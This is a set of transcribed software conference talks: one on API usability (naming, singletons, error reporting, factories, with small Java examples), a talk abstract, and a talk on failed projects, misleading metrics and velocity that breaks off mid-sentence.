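            // Assumes a small fixture file "three-lines.txt" with these three lines.
            List<String> expectedLines = Arrays.asList("first", "second", "third");

            FileReadLines file = new FileReadLines("three-lines.txt");

            assertEquals(expectedLines, file.readLines());
        }
    }

    // One possible minimal implementation the test could drive out.
    class FileReadLines {
        private final String path;
        FileReadLines(String path) { this.path = path; }
        List<String> readLines() throws IOException {
            return Files.readAllLines(Paths.get(path), StandardCharsets.UTF_8);
        }
    }

Writing the test first makes it painful to build readers and buffers by hand inside the test, which is exactly the pressure that pushes the API towards the simpler shape.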
OK. Naming. We always talk about naming. We also usually have big heated conversations in the team about these things. But the rules are actually simple rules - not necessarily simple to implement. So the first one is: reserve the simplest and most intuitive names for the entities used in the most common scenarios. Yeah? So for the scenarios that are the mainline ones, reserve the best names for those things. Pick one word per concept. This particular point is advanced stuff in investment banking. I've seen applications where, in the same application, the same concept was called trade, deal, contract and transaction. The same code base. OK. So this seems to be an easy thing to do. Well, it's easy to say, but it requires some discipline. Yeah? And use easy-to-remember conventions. So maybe get/set is not a great convention, but in Java, for example, it is an important one, simply because some libraries rely on it anyway. Yeah? So you can use that, or whatever it is you choose - make sure you follow it. This will help people to guess. The names will make the API actually easier and more consistent. Yeah? I've done this in several projects and it's actually, you know, a bit hard to do at the beginning, but then if the conventions are clear and not complicated, you know, without nitpicking on tiny details - you just need a few simple ones - you'll end up with a much, much better thing at the end. Don't be cute. Don't use funny names. Don't be funny. Don't do like one guy in a code base I worked in: he wrote things like - there was something to mark the difference between kinds of banking transactions, and he called it something like transaction-if-guru. That's not fun. That's a problem, because if I'm new to the project, yeah, I look for the thing that makes the difference, and then I read "guru" and it's like, what the heck is this thing? Yeah? And this is an example of what not to do, taken from Java again. I'm not trying to pick on Java. It's just that it's full of good examples for this kind of talk. There is something called java.io.ObjectStreamConstants. Obviously, it's obvious what it does, yeah? And there is also some documentation: these are constants written into the Object Serialization Stream. Can anybody guess what this thing does? Then I look inside and say, ah, static ints, and it is beautiful also that the constants have comments like baseWireHandle - first wire handle to be assigned - or PROTOCOL_VERSION_1 - a stream protocol version. What the hell is going on here? Then, if you think about it, actually this is a kind of DSL for the serialization. They use these constants to mark various points in the serialization stream. So it's actually a DSL, yeah? The problem is not that it's expressed with constants - it is a DSL - but the naming of the class tells you how it is implemented, using constants. It's not telling you what it does, what it's supposed to do. And the comments here are the kind of comments where you basically copy the name, paste it, and put spaces in between the uppercase words. But this is a very common thing. I see it again and again. Explicit context - what do I mean by this? So we have some assumptions when we produce an API. We have assumptions about the external environment, yeah? And there are also a couple of kinds of context we're interested in: there is a deployment context, yeah, and the runtime one. The assumptions about the external environment are also things about who controls the application, things like this. Typically, GUI APIs often want to own the main thread, the main loop, stuff like this.
And then there is the context of deployment and runtime. The deployment one: dependencies on other APIs, which version should you have of this other thing for this one to work? Dependencies on deployment parts: sometimes you can deploy only some parts of your system, for whatever reason, yeah? Or I've worked with APIs that deal with user permissions, licensing, things like this. So these are things you have to keep in mind and have to be very clear about, yeah? An example of an interesting deployment context in a bank: I was working in a system that used an internally developed logging framework. Well, the logging framework was in the application, so I joined the team, something was not quite working and then I said, okay, look at the logs. I couldn't see any logs. After a couple of hours of confusion, because I knew that the application was going through those parts, I asked a colleague and he said, oh yeah, I forgot to tell you, you know, it depends on this setting in the Windows registry. If you don't set this in the registry, it won't log anything in your application. Okay, I used some colorful Italian expressions at that point. This is an assumption about the deployment context and it was not even made public, yeah? Whatever you may think about this kind of choice, and I don't have a positive opinion on it, still, it was an important one. And then there is the runtime context: initialization and finalization steps. Depending on the API, sometimes you need some method called at the beginning, initialize, and finalize at the end. I don't know, maybe if you have, for example, middleware, typically if you have used some middleware systems, sometimes you have to initialize the thing that will connect you to the external world, yeah? Stuff like this in the main. Preconditions for calling methods or functions or instantiating classes, yeah? How can I use this? As a user of the API, what am I supposed to do to be able to use the functionality, yeah? Assumptions about global application state: this is my preferred one. Because global state, now, global is not actually cool anymore. In recent years we are done with globals, you know: no more globals, we use singletons. People think that a singleton is not a global variable. Because my description of a singleton is that it's a global variable with a raincoat and dark glasses, yeah? Trying to look inconspicuous, you know, unnoticed. The thing is that if you have global state in your API, you can actually cause trouble for the users. Because, sorry, it can be very difficult to use in a concurrent environment, yeah? If you went to the Clojure talks and things, they might, I wasn't there, but they might mention these kinds of things, yeah? The functional languages are big on this. You don't want any global stuff. Not even global, not even changing stuff most of the time, so even stronger than that. They can make test setup extremely hard.
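A small sketch of why that happens; `AuditLog` and `TradeBooker` are invented names, but the shape is the one being described: the call to the singleton sits inside the method, so a test cannot easily substitute it, while the explicit version can be given a fake:

```java
// An invented singleton holding global state.
class AuditLog {
    private static final AuditLog INSTANCE = new AuditLog();
    public static AuditLog getInstance() { return INSTANCE; }
    public void record(String event) { /* writes to some shared, global place */ }
}

class TradeBooker {
    public void book(String trade) {
        // Hidden dependency: nothing in the signature tells the caller
        // (or the test) that global state is touched in here.
        AuditLog.getInstance().record("booked " + trade);
    }
}

// The testable alternative: the dependency is explicit, so a test can pass
// in its own AuditLog (or a fake) without tricks in the build or the linker.
class ExplicitTradeBooker {
    private final AuditLog auditLog;

    public ExplicitTradeBooker(AuditLog auditLog) {
        this.auditLog = auditLog;
    }

    public void book(String trade) {
        auditLog.record("booked " + trade);
    }
}
```

With the first version, every test that exercises `book` also touches whatever the singleton writes to, which is exactly the setup and concurrency pain being described.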
Now, I interviewed quite a few times people that said they knew design patterns. Typically, this is a hint that I have to ask them some interesting questions. That is, okay: what have you read? That is always the Gang of Four book, nothing else. Which pattern have you used? The singleton. Ha, ha. Have you had any problems with that? No. Do you test your code? Of course. How did you do that with the singleton? Ah, yeah, we had to do, you know, this trick in the linking so we could have the singleton for testing purposes. I was like, ah, that was actually not a problem, now that I think of it. Yeah, it was a bit of, you know. It can make penetrability really hard by hiding dependencies. If you use singletons, yeah, I now use the word singleton for the global state just for the sake of argument, it's just that you have a call onto the singleton inside your function, but it's invisible from outside. Yeah, so as a user of the API, I don't know that you call something there that is global state. So I may have horrible surprises. And I've had quite a few headaches because of this kind of stuff. Yeah. As I said, all this stuff so far sounds obvious, yeah? Yet, raise your hand if you have seen applications where there were singletons that gave you problems with testing or concurrency or whatever, yeah? There is plenty of that. So, reporting, the next one. This is extremely important for visibility, because if things go wrong, I need to know what I can do about that. Yeah? You just need to know how errors are reported, what is reported when, oh, sorry, I clicked one more, and what they can do about them. The code base I'm working on right now: the people there are using C++, and in C++, when you throw, you can throw everything, even the kitchen sink. You know, in the throw clause you can put strings, whatever type you like. They throw char star, which means that if something happens, I have no way to decide programmatically what kind of error it was, yeah? Java code I dealt with in a previous contract: the guys that worked on this framework, a wonderful persistency framework for the bank, gave out an API that had only one exception that was thrown in all cases, you know, wrong connection error, data error, whatever; the only way to decide what the problem was was parsing the message string. Yeah? So these are actually awful things that can cause incredible trouble, and you can't recover from errors easily if you have that, yeah? So actually, with the error reporting, you need to make recovery easy to do. So you can use error codes, possibly, or exception classes, or often a mix of the above, yeah? Sometimes I see exception classes with error codes inside, because, you know, depending on what you do, having a forest of exceptions is just as bad as having none, yeah? So there is a matter of balance. But whatever it is, it has to be easy from a programmatic point of view, yeah? So the user, the developer that is writing code with your API, has to have a way to take action in case something bad really happens. Yes? These errors, do you throw them in the face of the user? The user in this talk is the programmer using the API, okay? The user in this context is the user of the API, okay? Yeah, you throw them in their face. As I said, text messages are not good enough, yeah? And something that is not clear to many people is that error management and reporting need careful design from the very beginning. The problems I've seen are due to the fact that very often error management is an afterthought. Most of the time I have the same experience. And this is incredibly bad because it can cause trouble in the code using your API. They have to make all sorts of convoluted messes just to understand what is going on there, yeah? Possibly they need to know implementation details so they know what kind of thing to expect, yeah? And the other thing that is sometimes not clear to many people is that what is an error at one level may not be an error at another one.
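A minimal sketch of both ideas, machine-readable error information instead of a message string to parse, and an error at one level being a normal outcome at the next, using invented names (`PersistenceError`, `TradeLoader`) rather than an API from the talk:

```java
// One exception type carrying a machine-readable reason, instead of
// forcing callers to parse the message text.
enum PersistenceError { CONNECTION_LOST, NOT_FOUND, DATA_CORRUPT }

class PersistenceException extends RuntimeException {
    private final PersistenceError error;

    PersistenceException(PersistenceError error, String message) {
        super(message);
        this.error = error;
    }

    PersistenceError error() {
        return error;
    }
}

class TradeLoader {
    // The caller can now decide programmatically: a missing trade is handled
    // as a normal outcome at this level, everything else stays exceptional.
    String describe(String id) {
        try {
            return load(id);
        } catch (PersistenceException e) {
            if (e.error() == PersistenceError.NOT_FOUND) {
                return "no such trade: " + id;   // not an error up here
            }
            throw e;                             // genuinely exceptional, let it propagate
        }
    }

    private String load(String id) {
        // Stand-in for the real persistence call.
        throw new PersistenceException(PersistenceError.NOT_FOUND, "trade " + id + " not found");
    }
}
```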
This is something that confuses the hell out of many people. So if you read the file and the file class tells you it throws an exception, say a file-not-found exception, at that file class level that is obviously an error, yeah? It says, well, you told me to read something that doesn't exist. I'm telling you, I cannot do anything, sorry. From the perspective of the caller, it might not be an error, it might be something that just happens, yeah? We take data from some call that comes from the user, yeah? Who made a typo there, yeah? And then you just report back: look, the name you gave me doesn't exist, yeah? If it is a typo, you can't consider that as an exception at that level. It's something that happens here and you deal with it, yeah? It's not exceptional in any way, yeah? So the error at that level has a different connotation, okay? Because sometimes people think that whatever exception is at the bottom level has to be, you know, a major error that has to be reported all the way through. No, you don't want that. You have to take into account that, from the caller's point of view, it may not be an error. So you have to be clear, yeah, about your design there. And then the final thing, incremental design. I put this quote from Fred Brooks. How many of you know about Fred Brooks and have read this book, The Mythical Man-Month? Okay, so he is often quoted, you know, talking about clean architecture design. The interesting bit is that this quote is not about the internals of the system, it's about the APIs exported, yeah? "I will contend that conceptual integrity is the most important consideration in system design. It is better to have a system omit certain anomalous features and improvements, but to reflect one set of design ideas, than to have one that contains many good but independent and uncoordinated ideas." We often use conceptual integrity to talk about the internal architecture of our systems, yeah? But here, what Fred Brooks referred to is the outside point of view. He was the project lead of the IBM 360 operating system, yeah? So basically his users were programmers, yeah? Now when we talk about API design, we always talk about flexibility. We need to be able to do everything, yeah? You need to do this? Ha, my API can do that. You need to do that, completely different? We can do that as well. Yeah, my suggestion is start specific and small and be focused, yeah? Start with the 80% case first. And also I would say, remember that when you talk about API software there is the associated word framework; framework means that there are frames around it. Frames put some constraints, yeah, on what you do. A framework is made to limit your choices, not to extend them, yeah? Quite a counterintuitive thing, yeah? But if you do that, actually, you'll be in a much better position, because it's actually easier to extend your API later on. Because if you start big, we need to solve this problem and that problem, then you think, oh, okay, then we make it flexible, but flexibility is not truly flexible. It's flexible in a specific direction. If the changes go into a different one, you have a problem. How many of you have dealt with flexible frameworks, possibly written by you or by teammates or in your project, where the flexibility ended up being something that was just dead code to carry on and maintain? Yeah? So I'm suggesting: always start specific and small; you have more options later on.
When you know more, you know in which direction to actually add stuff, yeah? It's easier to add than to remove, always. And you are not going to need it anyway. You are very bad at predicting what you are going to need later on. Of course, sometimes we know that something is absolutely necessary. I'm not saying that is always the case. So if we know that, we do that, yeah? But most of the time, very often, we just don't know, we guess. Then there is the caveat I mentioned before, sorry, that public APIs are more difficult to refactor. In fact, some errors may actually become features. Think about Excel. I don't know if any of you have done any programming with Excel. Because it has an interesting concept of dates: the dates are integers counted from, I think it's the 31st of December, 1899. But then there is a bug in Excel, in that they thought that 1900, I think, was a leap year. And basically this screws up the whole thing. So everybody knows about the mistake. So all the code is written around that bug when they have to deal with dates in Excel. That's a feature. If they fix that, they will break tons of code. Yeah? And you can change them, but the techniques to refactor usually involve some form of deprecation and versioning. So it can be quite a complicated affair. It's not really a quick feedback loop of a few hours. It can be months, years. It can be a very, very long thing. Yeah? Or you can choose the C++ way, where you just pile up cruft on top of cruft and keep everything. Yeah? And now that I have some time, six minutes, so I wasn't sure if I could get to this point or not, I want to show a couple of studies that, you know, have something that surprised me in a way. The first one is the factory pattern. How many of you do Java in this room? C-sharp? How many of the APIs you use involve some form of factory to instantiate stuff? Now, I have more limited experience in C-sharp than in Java, and in Java certainly it seems that if you have an API without a factory, you know, you are not cool. But according to this study, the factories are detrimental to usability in several situations. I put a reference to the study also in the slides. You can download it from the web. And actually, the constructors are much better. Now I have to say that personally, in my personal experience, I agree with this. I didn't do the study, but I always find it awkward to work with factories, also because often they involve factories of factories. You know, you go to the meta-meta level and it's like, what the hell, I just want one of these. Sometimes, even if they reduce usability, you still need them for various reasons. You know, you don't want to expose some things. But often you can do without. So basically, if you are writing something that involves factories, take a step back and see if there are other ways to get around the problem.
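A hedged sketch of the contrast that study looked at; `Parser` and `ParserFactory` are invented names, but the two shapes are the familiar ones:

```java
// Factory style: an extra concept (and an extra hop) before the user
// gets to the thing they actually wanted.
class ParserFactory {
    public static ParserFactory newInstance() {
        return new ParserFactory();
    }

    public Parser createParser(String grammar) {
        return new Parser(grammar);
    }
}

// Constructor style: the simplest thing that could possibly work.
class Parser {
    private final String grammar;

    public Parser(String grammar) {
        this.grammar = grammar;
    }
}

class Usage {
    void viaFactory() {
        Parser parser = ParserFactory.newInstance().createParser("expr");
    }

    void viaConstructor() {
        Parser parser = new Parser("expr");
    }
}
```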
And then there is another one that is even more surprising for me: the constructors. Apparently, according to this study, programmers strongly prefer and were more effective with APIs that did not require constructor parameters. So basically construct without parameters and then set properties later. Which I found a bit odd. Yeah? I've read the study, so maybe I need to read it again to see if there are any caveats in the way they did it. But I find this very interesting. In this case, in my opinion, it doesn't really matter what they say, I would still go with a constructor and the parameters, because it's easy to forget setting stuff. And then if you find yourself, you know, doing construct, set, set, set, construct, set, set, you say, you know what, I'll put a factory in. And I say, now I have two problems. But, you know, these are kind of surprising things I found when I was researching the material. I wasn't really expecting this stuff. I don't know, especially in this one, why, but apparently it's like that. And nowadays, with the IDEs, I don't think it is actually that problematic anyway. You can always see the parameters there with the autocompletion. That said, I'm done. Any questions? Questions, remarks? These are links to all the resources, and then there are also some books I suggest. Yeah? But have you got any questions or remarks or even something that contradicts whatever I've said? Yes. Yeah. But still, yeah, you can do that. Yeah? So we said the example is a startable and stoppable thing. Yeah? You said: instead of throwing, you just ignore it if you're already started. That solves the problem of the exception, but introduces a new one. How do you know that it started? You know, basically what you end up doing is, in any part of the code where you need the thing to be started, you will start it, all over the place. Because it's like, I'm not quite sure here if it is in the state in which I want it. So you know what? I make sure it is. Which will make your successive refactoring actually quite hard. Sorry? A restart method. Yeah. Well, as you have seen in the refactored example, the refactored example is a potential solution; yeah, it is what we did. It was a better solution. I'm not saying that there is a best solution. But the whole point was that if you have something like this, you want the programmers, the users of the API, to be able to do something with it, to take decisions. If I start it, I want to be able to say, well, is it started? Can I, I want to be able to stop it? Yeah? Without resorting to strange tricks. Yeah? This was the point there. Then you can solve the problem, maybe, in many other ways. Yeah? My solution was an example of a solution. Okay? Any other? Okay. Thank you very much. Time for coffee. No problem. Perfect.
|
Programmers, explicitly or implicitly, when working on complex systems, end up designing some APIs to accomplish their tasks, either because the product itself is some kind of general purpose library or because they need to write some libraries and packages to hold the common code of their applications. There is plenty of information available about how to write clean and maintainable code, but not a lot about writing usable APIs. The two things are related, but they are not the same. In fact, clean code is code that is clean from the point of view of its maintainers; usable APIs, on the other hand, refer to code that programmers (other than the original author) find easy to use. We’ll see how usable APIs help in writing clean code (and vice-versa). In this session I will introduce the concept of API usability, explain its importance – e.g., impact on productivity and defects – and show its relation with clean code, as well as some (sometimes surprising) research results from the literature. I will also give some practical advice on how to start writing more usable APIs.
|
10.5446/51421 (DOI)
|
I guess we start. Hello, thanks very much for giving me one hour of your time. What I'd like to talk about today is a very painful personal experience of mine: how I kind of lost almost all my money when I was part of a startup a couple of years ago. And because it was completely under our control, we could do everything we wanted, which was brilliant. All of a sudden there was no politics, there was nobody telling us we can't do more tests or we can't do continuous integration because there's no money for a server. We could do anything we wanted. I hired ten people who I've worked with, some of them I've worked with before for years, they were some of the best developers I've worked with, and the other people we hired were incredibly smart. We did everything that people talk about at conferences like this. We did short iterations, we did continuous deployment, everything was tested in an automated way. We were very, very smart in the way we approached things, and then kind of somewhere in the summer of 2009 the company ran out of money. Then really bad things started happening. I've realized that although we were very, very, very, very smart in doing lots of this stuff, we weren't really smart at all. That's what I want to talk about today. I assume most of the people in this room are going to be developers because it's kind of a developer conference. Hopefully there's a couple of product people and things like that. This is mostly my journey and my eye-opening moments as a developer when I discovered that what we think is smart is not always the smartest thing to do. Maybe I'll challenge a bit of your thinking as well. For example, I travel a lot on planes, and I was traveling to Vienna two weeks ago, and on the plane there was a really nice girl sitting in front of me and there was a British guy sitting next to her. Do we have any Brits in the room? There's one. Okay, so I can slag Brits off then. The British knowledge of geography is legendary. They don't know the difference between Austria and Australia, and everything that's outside of the island is foreign. That's where they speak foreign. This British guy that was sitting in front of me was kind of hitting on this girl and I heard them speaking. He was saying, oh, where are you from? And she said, I'm Brazilian. He said, oh, Brazilian is my favorite language. He made himself look like a complete fool in my eyes, but by the end of the flight he got her number, they went out together and, hey, you know, Brazilian is his favorite language. So although to me that looked completely stupid, obviously there was a method to it. So some of the things I'll talk about today might sound completely stupid, and, you know, when I started looking they did sound completely stupid and obvious, but hey, that said, I made a fool out of myself and maybe I'll prevent some people here from doing that. And one really interesting thing these days is that software is everywhere. We have won. We are in absolutely all the industries everywhere. We are controlling everything. NSA is spying on us as we speak. And I've read some statistics: in 2004, apparently, according to this research, companies in the European Union alone, lucky for Norwegians you're not part of that, but companies in the European Union alone have wasted 140 billion euros on failed software in that one year.
So, and I'm sure for a lot of those projects people declared success and victory like we did because, hey, we have all the tests are passing, you know, we have fantastic test coverage or maybe not, but kind of even declaring victory there is kind of a very interesting thing if we as an industry lose 140 billion a year only in Europe. And I realized kind of when we lost all the money as a company, I realized that kind of we are declaring victory too early and we're declaring victory and completely the wrong things. When we say we are done, we are far, far away from being done. Lots of people when I speak to as a consultant when I start working with them, we find a scramble that is done and then done, done and then there's often a done, done, done which kind of puts people into several levels of doneness. If you Google for done, done, done, done, there's about 20,000 results which is kind of a bit alarming. But as an industry we are very bad defining what done actually means. And I think as we are now everywhere, that becomes more and more obvious. But people often say that, you know, this is because IT is an immature industry, it's where, you know, we have not matured yet as an engineering discipline, we need more engineering, we need more science and crap like that. I think that's not true because other industries have been failing horribly badly like that for hundreds and hundreds of years, even when they were pretty mature. And I think there's a lot of stuff we can learn from other industries to prevent ourselves from doing that. So kind of when we lost all the money and I was left without money to pay the rent next month and I had to go back to consulting urgently, I started kind of trying to figure out how could we have been so clever and so stupid and then discovering that this is not just an IT problem, people have been messing up like this for hundreds and hundreds of years. So I started kind of looking for solutions in other parts of the world and other industries. And one really, really interesting thing I found was this fantastic Swedish government project that was done a couple of hundred years ago. That's an amazing story, absolutely amazing story. Done at a time where ship building that was relatively mature industry was going through the same kind of shift we have now with kind of cloud based and on-site deployments. So you can almost tell that story again and you know tell it about an IT company and what they were doing is it was just about the time when ship building was moving from on-site to cloud. What I mean by that is before that ships were typically built to get lots of people with lots of kind of spears and swords and guns on and then what they would do is they would ram one ship into another, couple of hundred people would jump and kill everybody and that would kind of be the battle. And at that point in time it was just becoming possible to put lots of cannons on a ship. So all of a sudden you had this kind of cloud based deployment. You could shoot people from afar. And this kind of government project was quite interesting because the key sponsor for that was very, very politically charged. The key sponsor was the king of Sweden. And Sweden was an up and coming kind of power then and he wanted to build a really, really powerful ship. So the problem with that is he couldn't decide whether he wanted a cloud based deployment or an on-site deployment. So he kind of changed the requirements all the time. 
And because this was a very, very politically charged situation he changed the specs himself. It's like the customer telling you, no, no, this is what I want. No, that's not what I wanted. I told you to do this. And then the ship was kind of made longer and shorter and longer and shorter. Then more cannons, then fewer cannons, and then, kind of the day before the ship actually set sail, the key business stakeholder decided: we want more cannons, more cannons, more cannons. So they put a bit more cannons on the ship. And the ship is famous for kind of setting sail in the morning with this kind of big launch thing and then sailing about one and a half kilometers and sinking. It's called Vasa. It's an amazing story. And kind of the ship shipped, literally, like we ship software, but kind of even more literally than that. But it didn't ship very far. Like our software that we built in that startup: we shipped. It was really good. It's on production. Hey! But it didn't ship very far, unfortunately. And this is the real problem. We declared success at the point when our ship was there. And kind of it got there and turned over because there were too many cannons on the front of the ship. And yeah, we were still successful. We were doing good. We were one of the best teams. And we had the TDD, continuous deployment and stuff like that. And that's how we measured success. So kind of that's when I started looking at stuff like: why do we end up in this situation? Why do we have five levels of doneness? And addressing it from lots of different perspectives, and how do we stop doing that? And I realized that the way we were planning things was causing us to do that. And the way we were planning things, if I had been cleverer then and changed that way very, very slightly, we would have been a million times more effective. And since then I've kind of applied this with a couple of companies and it works like magic. So maybe I can inspire you to change your thinking slightly and ship rather than ship. So kind of the way we were planning things is kind of the default way of how people plan today. It's kind of user stories, very much like this one. I'm sure everybody's seen something like this. And kind of these user stories describe the role of a person trying to do something, what they're trying to do and kind of what they want. And we'd mark things done when that goes live and all the tests pass and everything. So we measured success the way most people measure success. We measured success by looking at bug trends. This is not from our system. It's one Jira screenshot I particularly like, because this thing here has been critical for four weeks and five days and nobody cares. So we looked at bug trends. We looked at bug statistics. We collected a lot of the information like that. We marked things as priority one, two, or three, critical one. This is what a lot of people do these days. I assume many of you do something like that. And kind of what we also did is we had lots of tests. So we wanted to make sure that our test coverage is good. And one of the criteria for our success is kind of: test coverage is good. And this is kind of again not a screenshot from our team but a really interesting one, because you know here you have something like 97.36% coverage and on the other hand 33%. There's a big variance in this. There's lots of numbers. And I've seen people be overly obsessed about those numbers.
I've worked with people where there's a policy that the test coverage has to be more than 90% or something like that. And then what we did is we'd collect all that information because this is just not enough information. We don't have enough numbers here. So we'd collect that more and create dashboards like this. And again, this is a screenshot they found online and it's one I really, really like because we had similar dashboards like this but not as bad as this one. This has 10,078 violations. Most of the major and nobody cares about that. So lots of very interesting information there. What we also did is we did something that people today are overly obsessed with. And we were completely obsessed with that. And what we did is we would measure the success of our team and the performance of our team by measuring story points and velocity. I see people nodding in this. So lots of you do that. And that was our measurement of success. It's like we are delivering 70 story points. Hey! Fantastic. So the interesting thing about all these metrics including story points is they are all negative metrics. Negative metrics can tell you that something is wrong but they cannot tell you that something is right. For example, a very high bug count can tell us that something is wrong. If I have 500 bugs in the system, I know it's not good. A very low bug count doesn't give us any information. That might mean it's not been tested. That might mean people who tested it don't know how to test it. That might mean we didn't understand the level of risk. That might mean, hey, you know, it was superficial and stuff like that. So it doesn't give us any useful information. Test coverage is the same. Very low test coverage is telling us something is wrong. A very high test coverage isn't telling us anything. I've worked with a couple of banking clients where because they have the policy that everything has to go over 80% and the build system, the version control would refuse to accept changes that take coverage below 80%. People started writing lots of tests without any assertions, which kind of completely defeats the point. So negative metrics are dangerous because they lead us to a wrong path. For example, blood pressure is a very good negative metric of human health. Very high blood pressure is giving us useful information. If I have a very high blood pressure, something's not good. I can reduce blood pressure immediately by cutting my head off. That is not going to make me healthier. And a lot of the teams I've worked with do that all the time. They take a negative metric and they optimize it. They look at the number of bugs, they optimize the number of bugs, they optimize code coverage, or they optimize velocity. Velocity is a really strange one because people perceive velocity as a positive metric while it's not. So for example, this particular picture is from rapidscrum.com. You can go and find it there. Rapidscrum is a website by one of the kind of leaders in the Scrum community. And this particular picture is showing my space transformation to Scrum. What it's telling us is this kind of whole thing about Scrum hyperproductivity. And this particular picture is this line above is the MySpace hyperproductivity. What it's telling us is that after transforming to Scrum, MySpace became 800% hyperproductive. Now when you tell that to somebody, that sounds good. Who here is using MySpace? Okay. So the fact that they are 800% hyperproductive is irrelevant. Absolutely irrelevant. Here's another kind of example. 
So let's say we are here in Oslo and you look like somebody from Norway. Okay. So where do you live? Oslo. No, that's wrong. You live in Kristiansund now. You're my volunteer. Yeah. So I don't know why you live there, but that's okay. So by the way, doing this thing on Google, I found a really interesting typo there. You see, here it says this route has tolls. And being Norway, I'm sure what they wanted to say is this route has trolls. Given where we're going. But so anyway, so my friend here, what's your name? Una. Una lives in Kristiansund. And he tells me, like, you know, come and visit me there. And I know from Google that this is almost 600 kilometers and it's going to take me seven hours, running away from trolls most of the time. And because he doesn't want to wait for me for seven hours, and this can be seven or eight or nine, depending on whether the trolls catch me or not, we have an agreement that when I get close to kind of Kristiansund, I give him a call. And about three hours later, I call Una and say, hey, I'm in Kristiansand. It's taken me three hours, 49 minutes, 302 kilometers. Is that good or bad? It's unexpected, but is it unexpectedly good or bad? So I'm in Kristiansand. And because we're agile, we just replanned it, and it's just one letter. What was the problem? We arrived there earlier. We're hyper productive. I'm 300% hyper productive here. So the problem with velocity: if you look at velocity as a physical measure, like in physics, velocity is a vector. It's not speed. It's direction plus speed. And what we call velocity in software is just speed. We have delivered 70 story points this week. Fantastic. Good. Next week, we're doing 80. We're much better. At the same time, you know, we could be going to Kristiansand, not Kristiansund, or whatever, I don't even speak English correctly, so I'm not even going to try to pronounce these. But that's the real problem: just by looking at velocity, we cannot decide if we're doing well or not. We can decide that we're not doing well. It's a negative measure. If I'm moving at 10 kilometers an hour, I know something is wrong. If I'm not moving at all, I know something is wrong. If I'm going along a route at 70 kilometers an hour, I cannot say that I'm right. There's information missing there. And the problem is, what we do with story points, with function points, with kind of the way we measure software delivery, is we declare victory on velocity. And that's really, really dangerous because it's a negative metric. And we try to optimize a negative metric. So Forrester Research last year published this report that talks about how companies actually do agile. And what they say is that lots of people adopt agile practices only for development. They leave the business decision making process out of it and they leave the kind of follow-up business process out of it. That's not in scope. And what people do there is they create a really, really effective, efficient engine. You replace a Trabant engine with an eight cylinder diesel thing from, I don't know, a BMW and it can go really, really fast. It delivers lots of story points. But nobody knows whether kind of those story points are actually useful or not. And because they don't know that, there's this big decision making up front that's left out of the agile process, and this kind of marination process at the end. And Forrester Research called this way of adoption Water-Scrum-Fall.
What they talk about is how kind of, if you do Water-Scrum-Fall, you're not really getting the benefit out of the engine. You have a really fast car, but it's just going around in circles. And what kind of, that's kind of what we were doing. And I want to make you think about that really hard if you are in that same situation. And if Forrester Research is correct, most of the people in this room will be. And give you some tools for how to escape that. So, the critical problem there is that when we do software projects, people pay for software projects or software products because they want some business outcome. And what we end up planning and negotiating is a bunch of stories or a bunch of features, a bunch of use cases, a bunch of requirements. It doesn't matter how we slice stuff. And kind of what we need to get to is start delivering this instead of delivering that. And in order to do that, we need to start planning differently. And the key problem with that is the way we describe plans, the way we describe roadmaps. This is a screenshot from the Adobe ColdFusion roadmap, the next generation of confusion. And I'm not picking on Adobe in particular. I think this is typical, at least, of the way lots of people do roadmaps these days. And if you look at the URL, it says ColdFusion Roadmap. What this is, actually, it's not a roadmap. It's a sequence of things. It's supporting the Water-Scrum-Fall thinking. We have a sequence of things we need to deliver. And then you children can go and play your Scrum and deliver that in cycles. But this is what we need to deliver. And the downside of that is that in today's age, the market opportunities change quite a lot. By the time we deliver this, the market has moved. And now we have this really, really fast engine that can move really fast. But we are not really using it to get the benefits out of learning and incorporating learning through delivery. Because even if people do use the stories, they do kind of milestone planning that is a sequence of things on a larger scale. And we call these things roadmaps. I will try to convince you today that this is horribly, horribly, horribly, horribly wrong. So this is kind of generally what I've seen people do: take a roadmap like that and then start creating this high-level product backlog and then start pushing user stories, lower-level stories, into Scrum or XP or Kanban or whatever, and then out comes a potentially shippable product increment. This is the way most people understand Scrum. This is the typical Scrum picture. And it's very important that I don't get misunderstood on my next sentence. I do not want to say that this was the original intention of Scrum. But from my experience this is how people understand it: the scope of Scrum is this part here. This is beyond the scope of Scrum. This is beyond the scope of Scrum. And then we get this Water-Scrum-Fall thinking, because this part here is: let's make a roadmap decision for six months up front. And this part here is: yeah, yeah, it's potentially shippable. Let's marinate it for a while until it improves. And then we can see what we're doing. Because of that, software teams declare victory here. Now that's very, very dangerous because we can end up putting more cannons on a ship and shipping it. And then the ship turns over.
So kind of the problem with that is that it stimulates linear thinking, because apart from this part in the middle that the developers are concerned about, if you go and talk to the people who make really important decisions, they see this thing as: I put something into the sausage factory here and out comes the sausage at the end. It's kind of linear. And this linear thinking promotes what Jim Shore in 2005 called story card hell, where people create 500 user stories that they can kind of put in JIRA and forget about them and then index them and then manage them and then replan and stuff like that. And that kind of creates this whole set of linear thinking. We're better with user stories than we were with big upfront plans, because at least we don't waste time detailing everything, but we still promote linear thinking. And whenever I see something like that, that reminds me of kind of big Russian Soviet era government death marches like this one. There's also kind of a very linear stream of people carrying stuff out. This is actually a picture of a famous project called the White Sea Canal. So the White Sea Canal is a famous death march that was organized early on during the kind of Soviet big planning era, where they decided that what they really need to do is dig a canal from the kind of Arctic sea down to Leningrad, because they figured there's some lakes in between, and although the distance is about 300 kilometers, there's only about 40 kilometers of canals you need to dig between the lakes. And this is a fantastic project and we're going to put lots of really enthusiastic political prisoners to do that. And this was a project implemented by about 200,000 people, out of which about 17,000 died, a proper death march. They have dug the canal. It was a glorious victory of the Soviet Union. Even today, about 70 years later, the canal is useless. It is useless for two main reasons. Reason number one, the water is frozen for six months a year. It's a White Sea Canal, ice. Reason number two, when they started digging in a couple of places, they hit really, really hard rock and they could only dig about three meters. So even when the water is not frozen, you can get like a very small sailing ship to go through, but nothing really serious. So from any kind of commercial perspective or military perspective, this is useless. It was a glorious victory where people kind of succeeded in delivering this. And if they were trying to kill 17,000 people, I think it was a good victory. Apart from that, I don't think they've achieved anything. And kind of, well, this is kind of quite extreme. One really interesting thing about this one is this project had a very, very vocal opponent, a guy called Peter Palchinsky. Peter Palchinsky is a fascinating figure. I strongly recommend googling him and reading everything you can find about him. He invented Lean Startup about a hundred years ago. He was an engineer that kind of figured out that lots of these projects fail because they have three dimensions nobody thinks about. One is a local dimension. You don't know that when you start digging through 40 kilometers, you're going to hit a really hard rock that gives you only three meters. The other one is a human dimension. You don't know that kind of people are not going to be that keen digging in really cold weather. And they're going to try and fudge it as much as they can, especially if they're prisoners.
